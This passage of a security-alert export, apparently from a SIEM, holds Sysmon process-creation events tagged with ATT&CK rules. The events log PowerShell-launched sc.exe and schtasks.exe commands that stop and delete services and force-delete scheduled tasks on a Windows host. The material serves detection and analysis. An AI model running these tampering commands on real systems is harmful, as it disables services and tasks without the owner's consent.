MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.435"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-0010bfb61d00}"",""processId"":""7984"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:27.714",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.415 +ProcessGuid: {df9fc3d3-b377-5ecf-0000-0010f8b51d00} +ProcessId: 6716 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SVSHost +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.418172200Z"",""eventRecordID"":""2290"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.415\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-0010f8b51d00}\r\nProcessId: 6716\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John 
Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.415"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-0010f8b51d00}"",""processId"":""6716"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:27.634",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:59.347 
+ProcessGuid: {df9fc3d3-b377-5ecf-0000-00108db31d00} +ProcessId: 7796 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop xWinWpdSrv +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:59.348622300Z"",""eventRecordID"":""2287"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:59.347\r\nProcessGuid: {df9fc3d3-b377-5ecf-0000-00108db31d00}\r\nProcessId: 7796\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:59.347"",""processGuid"":""{df9fc3d3-b377-5ecf-0000-00108db31d00}"",""processId"":""7796"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop xWinWpdSrv"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", 
+"May 29, 2020 @ 14:18:07.149",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:39.475 +ProcessGuid: {df9fc3d3-b363-5ecf-0000-001060391a00} +ProcessId: 3564 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: C:\Windows\system32\sc.exe start wuauserv +CurrentDirectory: C:\Windows\system32\ +User: NT AUTHORITY\SYSTEM +LogonGuid: {df9fc3d3-b270-5ecf-0000-0020e7030000} +LogonId: 0x3E7 +TerminalSessionId: 0 +IntegrityLevel: System +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b272-5ecf-0000-0010be3f0100} +ParentProcessId: 1092 +ParentImage: C:\Windows\System32\svchost.exe +ParentCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p""","C:\\Windows\\system32\\sc.exe start wuauserv",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:39.569216100Z"",""eventRecordID"":""2266"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:39.475\r\nProcessGuid: {df9fc3d3-b363-5ecf-0000-001060391a00}\r\nProcessId: 3564\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: C:\\Windows\\system32\\sc.exe start wuauserv\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {df9fc3d3-b270-5ecf-0000-0020e7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b272-5ecf-0000-0010be3f0100}\r\nParentProcessId: 1092\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k netsvcs -p\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:39.475"",""processGuid"":""{df9fc3d3-b363-5ecf-0000-001060391a00}"",""processId"":""3564"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\sc.exe start wuauserv"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""NT AUTHORITY\\\\SYSTEM"",""logonGuid"":""{df9fc3d3-b270-5ecf-0000-0020e7030000}"",""logonId"":""0x3e7"",""terminalSessionId"":""0"",""integrityLevel"":""System"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b272-5ecf-0000-0010be3f0100}"",""parentProcessId"":""1092"",""parentImage"":""C:\\\\Windows\\\\System32\\\\svchost.exe"",""parentCommandLine"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p""}}}", +"May 29, 2020 @ 14:18:06.087",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.753 +ProcessGuid: 
{df9fc3d3-b361-5ecf-0000-0010920d1a00} +ProcessId: 6072 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ECDnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.755565500Z"",""eventRecordID"":""2260"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.753\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010920d1a00}\r\nProcessId: 6072\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.753"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010920d1a00}"",""processId"":""6072"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ECDnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:06.071",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.727 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010ea0b1a00} +ProcessId: 5076 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.730622700Z"",""eventRecordID"":""2259"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.727\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010ea0b1a00}\r\nProcessId: 5076\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.727"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010ea0b1a00}"",""processId"":""5076"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:06.056",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.693 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-00102d0a1a00} +ProcessId: 4976 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for Windows Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} 
+ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.696089000Z"",""eventRecordID"":""2258"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.693\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-00102d0a1a00}\r\nProcessId: 4976\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s 
